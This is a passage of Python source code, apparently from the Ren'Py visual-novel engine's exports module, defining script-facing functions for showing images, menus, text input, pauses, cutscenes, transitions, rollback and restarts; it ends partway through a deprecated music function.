Tom Rothamel \r\n#\r\n# Permission is hereby granted, free of charge, to any person\r\n# obtaining a copy of this software and associated documentation files\r\n# (the \"Software\"), to deal in the Software without restriction,\r\n# including without limitation the rights to use, copy, modify, merge,\r\n# publish, distribute, sublicense, and/or sell copies of the Software,\r\n# and to permit persons to whom the Software is furnished to do so,\r\n# subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be\r\n# included in all copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\r\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\r\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\r\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\r\n# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\r\n# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\r\n# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n\r\n# This file contains functions that are exported to the script namespace.\r\n# Functions defined in this file can be updated by the user to change\r\n# their behavior, while functions imported in are probably best left\r\n# alone as part of the api.\r\n\r\n# Remember the real file.\r\n_file = file\r\n\r\nimport renpy.display\r\nimport renpy.audio\r\n\r\nfrom renpy.text.extras import ParameterizedText\r\nfrom renpy.text.font import register_sfont, register_mudgefont, register_bmfont\r\nfrom renpy.display.behavior import Keymap\r\nfrom renpy.display.minigame import Minigame\r\nfrom renpy.display.screen import define_screen, show_screen, hide_screen, use_screen, current_screen, has_screen, get_screen, get_widget\r\nfrom renpy.display.focus import focus_coordinates\r\nfrom renpy.display.predict import screen as predict_screen\r\n\r\nfrom renpy.curry import curry, partial\r\nfrom renpy.audio.sound import play\r\nfrom renpy.display.video import movie_start_fullscreen, movie_start_displayable, movie_stop\r\nfrom renpy.loadsave import load, save, list_saved_games, can_load, rename_save, unlink_save, scan_saved_game\r\nfrom renpy.python import py_eval as eval\r\nfrom renpy.python import rng as random\r\nfrom renpy.atl import atl_warper\r\nfrom renpy.easy import predict, displayable\r\nfrom renpy.substitutions import Translator\r\n\r\nfrom renpy.character import show_display_say, predict_show_display_say, display_say\r\n\r\nimport renpy.audio.sound as sound\r\nimport renpy.audio.music as music\r\n\r\nimport time\r\nimport sys\r\n\r\ndef public_api():\r\n \"\"\"\r\n This does nothing, except to make the pyflakes warnings about\r\n unused imports go away.\r\n \"\"\"\r\n ParameterizedText\r\n register_sfont, register_mudgefont, register_bmfont\r\n Keymap\r\n Minigame\r\n curry, partial\r\n play\r\n movie_start_fullscreen, movie_start_displayable, movie_stop\r\n load, save, list_saved_games, can_load, rename_save, unlink_save, scan_saved_game\r\n eval\r\n random\r\n atl_warper\r\n show_display_say, predict_show_display_say, display_say\r\n sound\r\n music\r\n time\r\n define_screen, show_screen, hide_screen, use_screen, has_screen\r\n current_screen, get_screen, get_widget\r\n focus_coordinates\r\n predict, predict_screen\r\n displayable\r\n Translator\r\n \r\ndel public_api\r\n\r\nimport collections\r\n\r\ndef roll_forward_info():\r\n if len(renpy.game.contexts) > 1:\r\n return None\r\n \r\n return renpy.game.log.forward_info()\r\n\r\ndef in_rollback():\r\n return renpy.game.log.in_rollback()\r\n\r\ndef checkpoint(data=None, keep_rollback=False):\r\n \"\"\"\r\n This creates a checkpoint that the user can rollback to. The\r\n checkpoint is placed at the statement after the last statement\r\n that interacted with the user. Once this function has been called,\r\n there should be no more interaction with the user in the current\r\n statement.\r\n \"\"\"\r\n\r\n if renpy.store._rollback:\r\n renpy.game.log.checkpoint(data, keep_rollback=keep_rollback)\r\n\r\ndef block_rollback():\r\n \"\"\"\r\n Prevents the game from rolling back to before the current\r\n statement.\r\n \"\"\"\r\n\r\n renpy.game.log.block()\r\n\r\nscene_lists = renpy.display.core.scene_lists\r\n \r\ndef count_displayables_in_layer(layer):\r\n \"\"\"\r\n Returns how many displayables are in the supplied layer.\r\n \"\"\"\r\n\r\n sls = scene_lists()\r\n\r\n return len(sls.layers[layer])\r\n\r\ndef image(name, d):\r\n \"\"\"\r\n :doc: se_images\r\n \r\n Defines an image. This function is the python equivalent of the \r\n image statement.\r\n \r\n `name`\r\n The name of the image to display, a string.\r\n \r\n `d`\r\n The displayable to associate with that image name.\r\n \r\n This function may only be run from inside an init block. It is an\r\n error to run this function once the game has started.\r\n \"\"\"\r\n\r\n if d is None:\r\n raise Exception(\"Images may not be declared to be None.\")\r\n \r\n if not renpy.game.context().init_phase:\r\n raise Exception(\"Images may only be declared inside init blocks.\")\r\n\r\n if not isinstance(name, tuple):\r\n name = tuple(name.split())\r\n\r\n d = renpy.easy.displayable(d)\r\n renpy.display.image.register_image(name, d)\r\n\r\ndef copy_images(old, new):\r\n if not isinstance(old, tuple):\r\n old = tuple(old.split())\r\n\r\n if not isinstance(new, tuple):\r\n new = tuple(new.split())\r\n\r\n lenold = len(old)\r\n \r\n for k, v in renpy.display.image.images.items():\r\n if len(k) < lenold:\r\n continue\r\n \r\n if k[:lenold] == old:\r\n renpy.display.image.register_image(new + k[lenold:], v)\r\n \r\ndef showing(name, layer='master'):\r\n \"\"\"\r\n This returns true if an image with the same tag as that found in\r\n the suppled image name is present on the given layer.\r\n\r\n @param name may be a tuple of strings, or a single string. In the latter\r\n case, it is split on whitespace to make a tuple. The first element\r\n of the tuple is used as the image tag.\r\n\r\n @param layer is the name of the layer.\r\n \"\"\"\r\n\r\n if not isinstance(name, tuple):\r\n name = tuple(name.split())\r\n\r\n return renpy.game.context().images.showing(layer, name)\r\n\r\ndef show(name, at_list=[ ], layer='master', what=None, zorder=0, tag=None, behind=[ ], atl=None, transient=False, munge_name=True):\r\n \"\"\"\r\n :doc: se_images\r\n :args: (name, at_list=[ ], layer='master', what=None, zorder=0, tag=None, behind=[ ])\r\n \r\n Shows an image on a layer. This is the programmatic equivalent of the show\r\n statement.\r\n \r\n `name`\r\n The name of the image to show, a string.\r\n \r\n `at_list`\r\n A list of transforms that are applied to the image.\r\n The equivalent of the ``at`` property.\r\n \r\n `layer`\r\n A string, giving the name of the layer on which the image will be shown.\r\n The equivalent of the ``onlayer`` property.\r\n \r\n `what`\r\n If not None, this is a displayable that will be shown in lieu of \r\n looking on the image. (This is the equivalent of the show expression\r\n statement.) When a `what` parameter is given, `name` can be used to\r\n associate a tag with the image.\r\n \r\n `zorder`\r\n An integer, the equivalent of the ``zorder`` property.\r\n \r\n `tag`\r\n A string, used to specify the the image tag of the shown image. The\r\n equivalent of the ``as`` property.\r\n \r\n `behind`\r\n A list of strings, giving image tags that this image is shown behind.\r\n The equivalent of the ``behind`` property.\r\n \"\"\"\r\n\r\n if renpy.game.context().init_phase:\r\n raise Exception(\"Show may not run while in init phase.\")\r\n \r\n if not isinstance(name, tuple):\r\n name = tuple(name.split())\r\n\r\n sls = scene_lists()\r\n key = tag or name[0]\r\n\r\n if renpy.config.sticky_positions: \r\n if not at_list and key in sls.at_list[layer]:\r\n at_list = sls.at_list[layer][key]\r\n\r\n if what is None:\r\n what = name\r\n elif isinstance(what, basestring):\r\n what = tuple(what.split())\r\n\r\n if isinstance(what, renpy.display.core.Displayable):\r\n base = img = what\r\n\r\n else:\r\n\r\n if renpy.config.image_attributes:\r\n new_what = renpy.game.context().images.apply_attributes(layer, key, name)\r\n if new_what is not None:\r\n what = new_what\r\n name = (key,) + new_what[1:]\r\n \r\n base = img = renpy.display.image.ImageReference(what, style='image_placement')\r\n \r\n if not base.find_target() and renpy.config.missing_show:\r\n if renpy.config.missing_show(name, what, layer):\r\n return\r\n \r\n for i in at_list:\r\n if isinstance(i, renpy.display.motion.Transform):\r\n img = i(child=img)\r\n else:\r\n img = i(img)\r\n\r\n # Update the list of images we have ever seen.\r\n renpy.game.persistent._seen_images[name] = True\r\n\r\n if tag and munge_name:\r\n name = (tag,) + name[1:]\r\n \r\n\r\n if renpy.config.missing_hide:\r\n renpy.config.missing_hide(name, layer)\r\n\r\n sls.add(layer, img, key, zorder, behind, at_list=at_list, name=name, atl=atl, default_transform=renpy.config.default_transform, transient=transient)\r\n \r\n\r\ndef hide(name, layer='master'):\r\n \"\"\"\r\n :doc: se_images\r\n \r\n Hides an image from a layer. The python equivalent of the hide statement.\r\n \r\n `name`\r\n The name of the image to hide. Only the image tag is used, and \r\n any image with the tag is hidden (the precise name does not matter).\r\n \r\n `layer`\r\n The layer on which this function operates.\r\n \"\"\"\r\n\r\n if renpy.game.context().init_phase:\r\n raise Exception(\"Hide may not run while in init phase.\")\r\n\r\n if not isinstance(name, tuple):\r\n name = tuple(name.split())\r\n\r\n sls = scene_lists()\r\n key = name[0]\r\n sls.remove(layer, key)\r\n\r\n if renpy.config.missing_hide:\r\n renpy.config.missing_hide(name, layer)\r\n \r\n\r\ndef scene(layer='master'):\r\n \"\"\"\r\n :doc: se_images\r\n\r\n Removes all displayables from `layer`. This is equivalent to the scene\r\n statement, when the scene statement is not given an image to show.\r\n\r\n A full scene statement is equivalent to a call to renpy.scene followed by a\r\n call to :func:`renpy.show`. For example::\r\n \r\n scene bg beach \r\n \r\n is equivalent to::\r\n \r\n $ renpy.scene()\r\n $ renpy.show(\"bg beach\") \r\n \"\"\"\r\n\r\n if renpy.game.context().init_phase:\r\n raise Exception(\"Scene may not run while in init phase.\")\r\n\r\n sls = scene_lists()\r\n sls.clear(layer)\r\n\r\n if renpy.config.missing_scene:\r\n renpy.config.missing_scene(layer)\r\n \r\ndef watch(expression, style='default', **properties):\r\n \"\"\"\r\n This watches the given python expression, by displaying it in the\r\n upper-left corner of the screen (although position properties\r\n can change that). The expression should always be\r\n defined, never throwing an exception.\r\n\r\n A watch will not persist through a save or restart.\r\n \"\"\"\r\n\r\n def overlay_func():\r\n renpy.ui.text(unicode(renpy.python.py_eval(expression)),\r\n style=style, **properties)\r\n\r\n renpy.config.overlay_functions.append(overlay_func)\r\n\r\ndef input(prompt, default='', allow=None, exclude='{}', length=None, with_none=None): #@ReservedAssignment\r\n \"\"\"\r\n This pops up a window requesting that the user enter in some text.\r\n It returns the entered text.\r\n\r\n @param prompt: A prompt that is used to ask the user for the text.\r\n\r\n @param default: A default for the text that this input can return.\r\n\r\n @param length: If given, a limit to the amount of text that this\r\n function will return.\r\n\r\n @param allow: If not None, then if an input character is not in this\r\n string, it is ignored.\r\n\r\n @param exclude: If not None, then if an input character is in this\r\n set, it is ignored.\r\n\r\n @param with_none: If True, performs a with None after the input. If None,\r\n takes the value from config.implicit_with_none.\r\n \"\"\"\r\n\r\n renpy.exports.mode('input')\r\n \r\n if has_screen(\"input\"):\r\n widget_properties = { }\r\n widget_properties[\"input\"] = dict(default=default, length=length, allow=allow, exclude=exclude)\r\n\r\n show_screen(\"input\", _transient=True, _widget_properties=widget_properties, prompt=prompt)\r\n\r\n else:\r\n\r\n renpy.ui.window(style='input_window')\r\n renpy.ui.vbox()\r\n\r\n renpy.ui.text(prompt, style='input_prompt')\r\n renpy.ui.input(default, length=length, style='input_text', allow=allow, exclude=exclude)\r\n\r\n renpy.ui.close()\r\n\r\n renpy.exports.shown_window()\r\n \r\n roll_forward = renpy.exports.roll_forward_info()\r\n if not isinstance(roll_forward, basestring):\r\n roll_forward = None\r\n\r\n rv = renpy.ui.interact(mouse='prompt', type=\"input\", roll_forward=roll_forward)\r\n renpy.exports.checkpoint(rv)\r\n \r\n if with_none is None:\r\n with_none = renpy.config.implicit_with_none\r\n\r\n if with_none:\r\n renpy.game.interface.do_with(None, None)\r\n\r\n return rv\r\n\r\ndef menu(items, set_expr):\r\n \"\"\"\r\n Displays a menu, and returns to the user the value of the selected\r\n choice. Also handles conditions and the menuset.\r\n \"\"\"\r\n\r\n if renpy.config.old_substitutions:\r\n def substitute(s):\r\n return s % tag_quoting_dict\r\n else:\r\n def substitute(s):\r\n return s\r\n\r\n\r\n # Filter the list of items to only include ones for which the\r\n # condition is true.\r\n items = [ (substitute(label), value)\r\n for label, condition, value in items\r\n if renpy.python.py_eval(condition) ]\r\n\r\n # Filter the list of items on the set_expr:\r\n if set_expr:\r\n set = renpy.python.py_eval(set_expr) #@ReservedAssignment\r\n items = [ (label, value)\r\n for label, value in items\r\n if label not in set ]\r\n else:\r\n set = None #@ReservedAssignment\r\n\r\n # Check to see if there's at least one choice in set of items:\r\n choices = [ value for label, value in items if value is not None ]\r\n\r\n # If not, bail out.\r\n if not choices:\r\n return None\r\n\r\n # Show the menu.\r\n rv = renpy.store.menu(items)\r\n\r\n # If we have a set, fill it in with the label of the chosen item.\r\n if set is not None and rv is not None:\r\n for label, value in items:\r\n if value == rv:\r\n try:\r\n set.append(label)\r\n except AttributeError:\r\n set.add(label)\r\n return rv\r\n\r\ndef choice_for_skipping():\r\n \"\"\"\r\n This is called to indicate to the skipping code that we have\r\n reached a choice. If we're skipping, and if the skip after\r\n choices preference is not True, then this disables skipping.\r\n \"\"\"\r\n\r\n if renpy.config.skipping and not renpy.game.preferences.skip_after_choices:\r\n renpy.config.skipping = None\r\n \r\n\r\ndef predict_menu():\r\n \"\"\"\r\n Predicts widgets that are used by the menu.\r\n \"\"\"\r\n\r\n # This only makes sense for non-NVL menus. But when we have\r\n # NVL menus, they're likely to have already been predicted.\r\n #\r\n # An item lets us load imagebuttons as necessary.\r\n\r\n if not renpy.config.choice_screen_chosen:\r\n return\r\n \r\n items = [ (\"Menu Prediction\", True, False) ]\r\n \r\n predict_screen(\r\n \"choice\",\r\n items=items,\r\n )\r\n\r\n \r\ndef display_menu(items,\r\n window_style='menu_window',\r\n interact=True,\r\n with_none=None,\r\n caption_style='menu_caption',\r\n choice_style='menu_choice',\r\n choice_chosen_style='menu_choice_chosen',\r\n choice_button_style='menu_choice_button',\r\n choice_chosen_button_style='menu_choice_chosen_button',\r\n scope={ },\r\n widget_properties=None,\r\n screen=\"choice\",\r\n type=\"menu\", #@ReservedAssignment\r\n predict_only=False,\r\n **kwargs):\r\n \"\"\"\r\n Displays a menu containing the given items, returning the value of\r\n the item the user selects.\r\n\r\n @param items: A list of tuples that are the items to be added to\r\n this menu. The first element of a tuple is a string that is used\r\n for this menuitem. The second element is the value to be returned\r\n if this item is selected, or None if this item is a non-selectable\r\n caption.\r\n\r\n @param interact: If True, then an interaction occurs. If False, no suc\r\n interaction occurs, and the user should call ui.interact() manually.\r\n\r\n @param with_none: If True, performs a with None after the input. If None,\r\n takes the value from config.implicit_with_none.\r\n \"\"\"\r\n\r\n if interact:\r\n renpy.exports.mode(type) \r\n choice_for_skipping()\r\n\r\n # The possible choices in the menu.\r\n choices = [ val for label, val in items ]\r\n while None in choices:\r\n choices.remove(None)\r\n\r\n # Roll forward.\r\n roll_forward = renpy.exports.roll_forward_info()\r\n\r\n if roll_forward not in choices:\r\n roll_forward = None\r\n \r\n # Auto choosing.\r\n if renpy.config.auto_choice_delay:\r\n\r\n renpy.ui.pausebehavior(renpy.config.auto_choice_delay,\r\n random.choice(choices))\r\n\r\n # The chosen dictionary.\r\n chosen = renpy.game.persistent._chosen\r\n if chosen is None:\r\n chosen = renpy.game.persistent._chosen = { }\r\n\r\n # The location\r\n location=renpy.game.context().current\r\n \r\n \r\n # Show the menu.\r\n if has_screen(screen):\r\n\r\n item_actions = [ ]\r\n\r\n if widget_properties is None:\r\n props = { }\r\n else:\r\n props = widget_properties\r\n \r\n for (label, value) in items:\r\n\r\n if not label:\r\n value = None\r\n\r\n if value is not None:\r\n action = renpy.ui.returns(value)\r\n else:\r\n action = None\r\n \r\n label_chosen = ((location, label) in chosen)\r\n \r\n if renpy.config.choice_screen_chosen:\r\n item_actions.append((label, action, label_chosen))\r\n else:\r\n item_actions.append((label, action))\r\n\r\n show_screen(screen, items=item_actions, _widget_properties=props, _transient=True, **scope)\r\n\r\n else:\r\n renpy.ui.window(style=window_style, focus=\"menu\")\r\n renpy.ui.menu(items,\r\n location=renpy.game.context().current,\r\n focus=\"choices\",\r\n default=True,\r\n caption_style=caption_style,\r\n choice_style=choice_style,\r\n choice_chosen_style=choice_chosen_style,\r\n choice_button_style=choice_button_style,\r\n choice_chosen_button_style=choice_chosen_button_style,\r\n **kwargs)\r\n\r\n renpy.exports.shown_window()\r\n\r\n # Log the chosen choice.\r\n for label, val in items:\r\n if val is not None:\r\n log(\"Choice: \" + label)\r\n else:\r\n log(label)\r\n\r\n log(\"\")\r\n\r\n if interact:\r\n \r\n rv = renpy.ui.interact(mouse='menu', type=type, roll_forward=roll_forward)\r\n\r\n # Mark this as chosen.\r\n for label, val in items:\r\n if rv == val:\r\n chosen[(location, label)] = True\r\n\r\n \r\n for label, val in items:\r\n if rv == val:\r\n log(\"User chose: \" + label)\r\n break\r\n else:\r\n log(\"No choice chosen.\")\r\n\r\n log(\"\")\r\n\r\n checkpoint(rv)\r\n \r\n if with_none is None:\r\n with_none = renpy.config.implicit_with_none\r\n\r\n if with_none:\r\n renpy.game.interface.do_with(None, None)\r\n\r\n return rv\r\n \r\n return None\r\n\r\nclass TagQuotingDict(object):\r\n def __getitem__(self, key):\r\n\r\n store = vars(renpy.store)\r\n \r\n if key in store:\r\n rv = store[key]\r\n\r\n if isinstance(rv, (str, unicode)):\r\n rv = rv.replace(\"{\", \"{{\")\r\n\r\n return rv\r\n else:\r\n if renpy.config.debug:\r\n raise Exception(\"During an interpolation, '%s' was not found as a variable.\" % key)\r\n return \"<\" + key + \" unbound>\"\r\n\r\ntag_quoting_dict = TagQuotingDict()\r\n\r\ndef predict_say(who, what):\r\n \"\"\"\r\n This is called to predict the results of a say command.\r\n \"\"\"\r\n\r\n if who is None:\r\n who = renpy.store.narrator # E1101 @UndefinedVariable\r\n\r\n if isinstance(who, (str, unicode)):\r\n return renpy.store.predict_say(who, what)\r\n\r\n predict = getattr(who, 'predict', None)\r\n if predict: \r\n predict(what)\r\n\r\ndef scry_say(who, scry):\r\n \"\"\"\r\n Called when scry is called on a say statement. Needs to set\r\n the interacts field.\r\n \"\"\"\r\n \r\n try:\r\n scry.interacts = who.will_interact()\r\n except:\r\n scry.interacts = True\r\n \r\ndef say(who, what, interact=True):\r\n \"\"\"\r\n This is the core of the say command. If the who parameter is None\r\n or a string, it is passed directly to display_say. Otherwise, the\r\n say method is called on the who object with what as a parameter.\r\n \"\"\"\r\n \r\n if renpy.config.old_substitutions:\r\n # Interpolate variables.\r\n what = what % tag_quoting_dict\r\n\r\n if who is None:\r\n who = renpy.store.narrator # E1101 @UndefinedVariable\r\n\r\n if isinstance(who, (str, unicode)):\r\n renpy.store.say(who, what, interact=interact)\r\n else:\r\n who(what, interact=interact)\r\n\r\n \r\ndef imagemap(ground, selected, hotspots, unselected=None, overlays=False,\r\n style='imagemap', mouse='imagemap', with_none=None, **properties):\r\n \"\"\"\r\n Displays an imagemap. An image map consists of two images and a\r\n list of hotspots that are defined on that image. When the user\r\n clicks on a hotspot, the value associated with that hotspot is\r\n returned.\r\n\r\n @param ground: The name of the file containing the ground\r\n image. The ground image is displayed for areas that are not part\r\n of any hotspots.\r\n\r\n @param selected: The name of the file containing the selected\r\n image. This image is displayed in hotspots when the mouse is over\r\n them.\r\n\r\n @param hotspots: A list of tuples defining the hotspots in this\r\n image map. Each tuple has the format (x0, y0, x1, y1, result).\r\n (x0, y0) gives the coordinates of the upper-left corner of the\r\n hotspot, (x1, y1) gives the lower-right corner, and result gives\r\n the value returned from this function if the mouse is clicked in\r\n the hotspot.\r\n\r\n @param unselected: If provided, then it is the name of a file\r\n containing the image that's used to fill in hotspots that are not\r\n selected as part of any image. If not provided, the ground image\r\n is used instead.\r\n \r\n @param overlays: If True, overlays are displayed when this imagemap\r\n is active. If False, the overlays are suppressed.\r\n\r\n @param with_none: If True, performs a with None after the input. If None,\r\n takes the value from config.implicit_with_none.\r\n \"\"\"\r\n\r\n renpy.exports.mode('imagemap')\r\n \r\n renpy.ui.imagemap_compat(ground, selected, hotspots, unselected=unselected,\r\n style=style, **properties)\r\n\r\n roll_forward = renpy.exports.roll_forward_info()\r\n if roll_forward not in [ result for _x0, _y0, _x1, _y1, result in hotspots]:\r\n roll_forward = None\r\n \r\n rv = renpy.ui.interact(suppress_overlay=(not overlays),\r\n type='imagemap',\r\n mouse=mouse,\r\n roll_forward=roll_forward)\r\n\r\n renpy.exports.checkpoint(rv)\r\n\r\n if with_none is None:\r\n with_none = renpy.config.implicit_with_none\r\n\r\n if with_none:\r\n renpy.game.interface.do_with(None, None)\r\n\r\n return rv\r\n \r\n\r\ndef pause(delay=None, music=None, with_none=None, hard=False):\r\n \r\n if renpy.config.skipping == \"fast\":\r\n return True\r\n\r\n renpy.exports.mode('pause')\r\n \r\n if music is not None:\r\n newdelay = renpy.audio.music.get_delay(music)\r\n\r\n if newdelay is not None:\r\n delay = newdelay\r\n\r\n if hard: \r\n renpy.ui.saybehavior(dismiss='dismiss_hard_pause')\r\n else:\r\n renpy.ui.saybehavior()\r\n \r\n if delay is not None:\r\n renpy.ui.pausebehavior(delay, False)\r\n\r\n roll_forward = renpy.exports.roll_forward_info()\r\n if roll_forward not in [ True, False ]:\r\n roll_forward = None\r\n \r\n rv = renpy.ui.interact(mouse='pause', type='pause', roll_forward=roll_forward)\r\n renpy.exports.checkpoint(rv, keep_rollback=True)\r\n\r\n\r\n if with_none is None:\r\n with_none = renpy.config.implicit_with_none\r\n\r\n if with_none:\r\n renpy.game.interface.do_with(None, None)\r\n\r\n return rv\r\n\r\n\r\ndef movie_cutscene(filename, delay=None, loops=0, stop_music=True):\r\n \"\"\"\r\n This displays an MPEG-1 cutscene for the specified number of\r\n seconds. The user can click to interrupt the cutscene.\r\n Overlays and Underlays are disabled for the duration of the cutscene.\r\n\r\n @param filename: The name of a file containing an MPEG-1 movie.\r\n\r\n @param delay: The number of seconds to wait before ending the cutscene.\r\n Normally the length of the movie, in seconds. If None, then the\r\n delay is computed from the number of loops (that is, loops + 1) *\r\n the length of the movie. If -1, we wait until the user clicks.\r\n \r\n @param loops: The number of extra loops to show, -1 to loop forever.\r\n\r\n Returns True if the movie was terminated by the user, or False if the\r\n given delay elapsed uninterrupted.\r\n \"\"\"\r\n\r\n renpy.exports.mode('movie')\r\n \r\n if stop_music:\r\n renpy.audio.audio.set_force_stop(\"music\", True)\r\n \r\n movie_start_fullscreen(filename, loops=loops)\r\n \r\n renpy.ui.saybehavior()\r\n\r\n if delay is None or delay < 0:\r\n renpy.ui.soundstopbehavior(\"movie\")\r\n else:\r\n renpy.ui.pausebehavior(delay, False)\r\n\r\n if renpy.game.log.forward:\r\n roll_forward = True\r\n else:\r\n roll_forward = None\r\n \r\n rv = renpy.ui.interact(suppress_overlay=True,\r\n suppress_underlay=True,\r\n show_mouse=False,\r\n roll_forward=roll_forward)\r\n\r\n # We don't want to put a checkpoint here, as we can't roll back while\r\n # playing a cutscene.\r\n\r\n movie_stop()\r\n\r\n if stop_music:\r\n renpy.audio.audio.set_force_stop(\"music\", False)\r\n\r\n return rv\r\n \r\n\r\ndef with_statement(trans, always=False, paired=None, clear=True):\r\n \"\"\"\r\n :doc: se_with\r\n :name: renpy.with_statement\r\n :args: (trans, always=False)\r\n \r\n Causes a transition to occur. This is the python equivalent of the\r\n with statement.\r\n \r\n `trans`\r\n The transition.\r\n \r\n `always`\r\n If True, the transition will always occur, even if the user has\r\n disabled transitions.\r\n \r\n This function returns true if the user chose to interrupt the transition,\r\n and false otherwise. \r\n \"\"\"\r\n\r\n if renpy.game.context().init_phase:\r\n raise Exception(\"With statements may not run while in init phase.\")\r\n\r\n if renpy.config.skipping:\r\n trans = None\r\n\r\n if not (renpy.game.preferences.transitions or always):\r\n trans = None\r\n\r\n renpy.exports.mode('with')\r\n \r\n return renpy.game.interface.do_with(trans, paired, clear=clear)\r\n\r\nglobals()[\"with\"] = with_statement\r\n\r\ndef rollback(force=False, checkpoints=1):\r\n \"\"\"\r\n Rolls the state of the game back to the last checkpoint.\r\n \"\"\"\r\n\r\n if not force:\r\n \r\n if not renpy.store._rollback:\r\n return\r\n \r\n if not renpy.game.context().rollback:\r\n return\r\n \r\n if not renpy.config.rollback_enabled:\r\n return\r\n \r\n renpy.config.skipping = None\r\n renpy.game.log.complete()\r\n renpy.game.log.rollback(checkpoints)\r\n\r\ndef toggle_fullscreen():\r\n \"\"\"\r\n Toggles the fullscreen mode.\r\n \"\"\"\r\n\r\n renpy.game.preferences.fullscreen = not renpy.game.preferences.fullscreen\r\n\r\ndef toggle_music():\r\n \"\"\"\r\n Toggles the playing of music.\r\n \"\"\"\r\n\r\n renpy.game.preferences.music = not renpy.game.preferences.music\r\n \r\ndef has_label(name):\r\n \"\"\"\r\n Returns true if name is a valid label in the program, or false\r\n otherwise.\r\n \"\"\"\r\n\r\n return renpy.game.script.has_label(name)\r\n\r\ndef get_all_labels():\r\n rv = [ ]\r\n\r\n for i in renpy.game.script.namemap.iterkeys():\r\n if isinstance(i, basestring):\r\n rv.append(i)\r\n\r\n return renpy.python.RevertableSet(rv)\r\n \r\n\r\ndef take_screenshot(scale=None, background=False):\r\n \"\"\"\r\n This causes a screenshot to be taken. This screenshot will be\r\n saved with a savegame when the game is saved.\r\n \"\"\"\r\n\r\n if scale is None:\r\n scale = (renpy.config.thumbnail_width, renpy.config.thumbnail_height)\r\n \r\n renpy.game.interface.take_screenshot(scale, background=background)\r\n\r\ndef full_restart(transition=False, label=\"_invoke_main_menu\", target=\"_main_menu\"):\r\n \"\"\"\r\n This causes a full restart of Ren'Py. \r\n \"\"\"\r\n\r\n if transition is False:\r\n transition = renpy.config.end_game_transition\r\n \r\n raise renpy.game.FullRestartException((transition, label, target))\r\n\r\ndef utter_restart():\r\n \"\"\"\r\n This causes an utter restart of Ren'Py. This reloads the script and\r\n re-runs initialization.\r\n \"\"\"\r\n\r\n raise renpy.game.UtterRestartException()\r\n\r\ndef quit(): #@ReservedAssignment\r\n \"\"\"\r\n This causes Ren'Py to exit entirely.\r\n \"\"\"\r\n\r\n raise renpy.game.QuitException()\r\n\r\ndef jump(label):\r\n \"\"\"\r\n Causes the current statement to end, and control to jump to the given\r\n label.\r\n \"\"\"\r\n\r\n raise renpy.game.JumpException(label)\r\n\r\ndef jump_out_of_context(label):\r\n \"\"\"\r\n Causes control to leave the current context, and then to be\r\n transferred in the parent context to the given label.\r\n \"\"\"\r\n\r\n raise renpy.game.JumpOutException(label)\r\n\r\ndef screenshot(filename):\r\n \"\"\"\r\n Saves a screenshot in the named filename.\r\n \"\"\"\r\n\r\n renpy.game.interface.save_screenshot(filename)\r\n \r\ndef windows():\r\n \"\"\"\r\n Returns true if we're running on Windows. This is generally used as a\r\n test when setting styles.\r\n \"\"\"\r\n\r\n import sys\r\n return hasattr(sys, 'winver')\r\n\r\ndef version():\r\n \"\"\"\r\n Returns a string containing the current version of Ren'Py, prefixed with the\r\n string \"Ren\\'Py \".\r\n \"\"\"\r\n\r\n return renpy.version\r\n\r\ndef module_version():\r\n \"\"\"\r\n Returns a number corresponding to the current version of the Ren'Py module,\r\n or 0 if the module wasn't loaded.\r\n \"\"\"\r\n\r\n return renpy.display.module.version\r\n\r\ndef transition(trans, layer=None, always=False, force=False):\r\n \"\"\"\r\n Sets the transition that will be used for the next\r\n interaction. This is useful when the next interaction doesn't take\r\n a with clause, as is the case with pause, input, and imagemap.\r\n\r\n @param layer: If the layer setting is not None, then the transition\r\n will be applied only to the layer named. Please note that only some\r\n transitions can be applied to specific layers.\r\n \"\"\"\r\n\r\n if not always and not renpy.game.preferences.transitions:\r\n trans = None\r\n\r\n renpy.game.interface.set_transition(trans, layer, force=force)\r\n\r\ndef get_transition(layer=None):\r\n return renpy.game.interface.transition.get(layer, None)\r\n \r\ndef clear_game_runtime():\r\n \"\"\"\r\n Resets the game runtime timer down to 0.\r\n\r\n The game runtime counter counts the number of seconds that have\r\n elapsed while waiting for user input in the current context. (So\r\n it doesn't count time spent in the game menu.)\r\n \"\"\"\r\n \r\n renpy.game.context().runtime = 0\r\n\r\ndef get_game_runtime():\r\n \"\"\"\r\n Returns the number of seconds that have elapsed in gameplay since\r\n the last call to clear_game_timer, as a float.\r\n\r\n The game runtime counter counts the number of seconds that have\r\n elapsed while waiting for user input in the current context. (So\r\n it doesn't count time spent in the game menu.)\r\n \"\"\"\r\n\r\n return renpy.game.context().runtime\r\n\r\ndef loadable(filename):\r\n \"\"\"\r\n Returns True if the given filename is loadable, meaning that it\r\n can be loaded from the disk or from inside an archive. Returns\r\n False if this is not the case.\r\n \"\"\"\r\n\r\n return renpy.loader.loadable(filename)\r\n\r\ndef exists(filename):\r\n \"\"\"\r\n Returns true if the given filename can be found in the\r\n searchpath. This only works if a physical file exists on disk. It\r\n won't find the file if it's inside of an archive.\r\n \"\"\"\r\n\r\n try:\r\n renpy.loader.transfn(filename)\r\n return True\r\n except:\r\n return False\r\n\r\ndef restart_interaction():\r\n \"\"\"\r\n Calling this restarts the current interaction. This will immediately end\r\n any ongoing transition, and will call all of the overlay functions again.\r\n\r\n This should be called whenever widgets are added or removed over the course\r\n of an interaction, or when the information used to construct the overlay\r\n changes.\r\n \"\"\"\r\n\r\n renpy.game.interface.restart_interaction = True\r\n \r\ndef context():\r\n \"\"\"\r\n Returns an object that is unique to the current context, that\r\n participates in rollback and the like.\r\n \"\"\"\r\n\r\n return renpy.game.context().info\r\n\r\ndef context_nesting_level():\r\n \"\"\"\r\n Returns the nesting level of the current context. This is 0 for the\r\n outermost context (the context that is saved, and in which most of\r\n the game runs), and greater than zero when in a menu or other nested\r\n context.\r\n \"\"\"\r\n\r\n return len(renpy.game.contexts) - 1\r\n \r\ndef music_start(filename, loops=True, fadeout=None, fadein=0):\r\n \"\"\"\r\n Deprecated music start function, retained for compatibility. Use\r\n 